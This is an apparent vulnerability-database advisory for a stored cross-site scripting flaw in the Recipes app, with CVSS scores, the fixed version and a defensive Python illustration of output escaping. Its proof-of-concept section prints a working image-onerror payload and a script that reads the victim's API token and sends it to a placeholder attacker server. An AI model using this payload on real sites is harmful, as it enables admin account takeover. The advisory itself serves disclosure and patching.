URL: https://www.mend.io/vulnerability-database/CVE-2022-23074
Submission: On June 29 via api from NL — Scanned from NL

MEND VULNERABILITY DATABASE

CVE-2022-23074

DATE: JUNE 21, 2022

OVERVIEW

In Recipes, versions 0.17.0 through 1.2.5 are vulnerable to Stored Cross-Site
Scripting (XSS) in the ‘Name’ field of the Keyword, Food and Unit components.
When a victim accesses the Keyword/Food/Unit endpoints, the XSS payload triggers.
A low-privileged attacker thereby obtains the victim's API key, which can lead to
takeover of the admin's account.

POC DETAILS

Access the application through a web browser and log in as a user. Navigate to
the food list from the navigation bar. On the food list page, click the plus '+'
icon. In the name input field, enter the XSS payload given in the "POC Code"
section below and save it. Then host the JavaScript file that fetches the
victim's API key (the code for the JavaScript file is in the "POC Code" section
below). In a new browser window, log in as administrator and access the food
list page (for example). This triggers the XSS payload, and the attacker
receives the admin's API key in the listener.

POC CODE

XSS payload: 
<img src=a onerror="var x=document.createElement('script');x.src='<attacker_server>/api.js';document.body.appendChild(x);">

JavaScript file (api.js):
var req = new XMLHttpRequest();
req.onload = handleResponse;
// The settings page of the logged-in victim is loaded in their own session.
req.open('get', '/settings/', true);
req.send();
function handleResponse() {
    // The API token is read out of the settings page HTML.
    var a = this.responseText.match(/Authorization: Token.{1,}/)[0];
    a = a.split("Token ")[1];
    a = a.split("<")[0];
    console.log(a);
    // The token is then sent to the listener named in the advisory's placeholder.
    var changeReq = new XMLHttpRequest();
    changeReq.open('get', '<attacker_server>:<attacker_port>/api=' + a, false);
    changeReq.send();
}

AFFECTED ENVIRONMENTS

0.17.0 through 1.2.5

PREVENTION

Update version to 1.2.6 or higher
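As an added illustration (not code from the advisory or from the Recipes project), the following Python contrasts interpolating a stored Food/Keyword/Unit name into HTML verbatim with output-encoding it, using the advisory's own payload as input, and adds an audit helper for finding names that already contain markup. The record layout, function names and sample rows are assumptions.

```python
import html
import re

# XSS payload quoted in the advisory's "POC Code" section; <attacker_server>
# is the advisory's own placeholder and is kept as-is.
POC_NAME = ('<img src=a onerror="var x=document.createElement(\'script\');'
            'x.src=\'<attacker_server>/api.js\';document.body.appendChild(x);">')

# Constructed sample rows standing in for the Food table (ids and names are made up).
FOODS = [
    {"id": 1, "name": "Tomato"},
    {"id": 2, "name": "Crème fraîche & butter"},
    {"id": 3, "name": POC_NAME},
]


def render_row_vulnerable(food):
    """Interpolates the stored name into HTML unchanged: the stored-XSS sink."""
    return '<li data-id="{}">{}</li>'.format(food["id"], food["name"])


def render_row_fixed(food):
    """Output-encodes the name so the browser shows it as text, not markup."""
    return '<li data-id="{}">{}</li>'.format(
        food["id"], html.escape(food["name"], quote=True))


def tag_count(rendered):
    """Number of '<' characters in a rendered row; a clean row has exactly two."""
    return rendered.count("<")


# Markup indicators that have no business in a plain-text name field.
_MARKUP = re.compile(r"<\s*/?\s*[a-z!]|\bon[a-z]+\s*=|javascript:", re.IGNORECASE)


def find_suspicious_names(records):
    """Audit helper: ids of Keyword/Food/Unit rows whose name contains markup.

    Useful for locating payloads that were stored before the upgrade to 1.2.6.
    """
    return [r["id"] for r in records if _MARKUP.search(r["name"])]


if __name__ == "__main__":
    for food in FOODS:
        print(render_row_fixed(food))
    print("suspicious ids:", find_suspicious_names(FOODS))
```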

LANGUAGE: PYTHON

GOOD TO KNOW:

Severity Score: 5.4
Weakness Type (CWE): Cross-Site Scripting (XSS), CWE-79
Top Fix: Upgrade to version 1.2.6

CVSS v3.1
Base Score: 5.4
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): Low
Integrity (I): Low
Availability (A): None

CVSS v2
Base Score: 3.5
Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (AU): Single
Confidentiality (C): None
Integrity (I): Partial
Availability (A): None

RELATED RESOURCES (3)

Url: https://nvd.nist.gov/vuln/detail/CVE-2022-23074
Url: https://github.com/TandoorRecipes/recipes/commit/7b2117c0190d4f541ba4cc7ee4122f04738c4ac6
Url: https://www.mend.io/vulnerability-database/CVE-2022-23074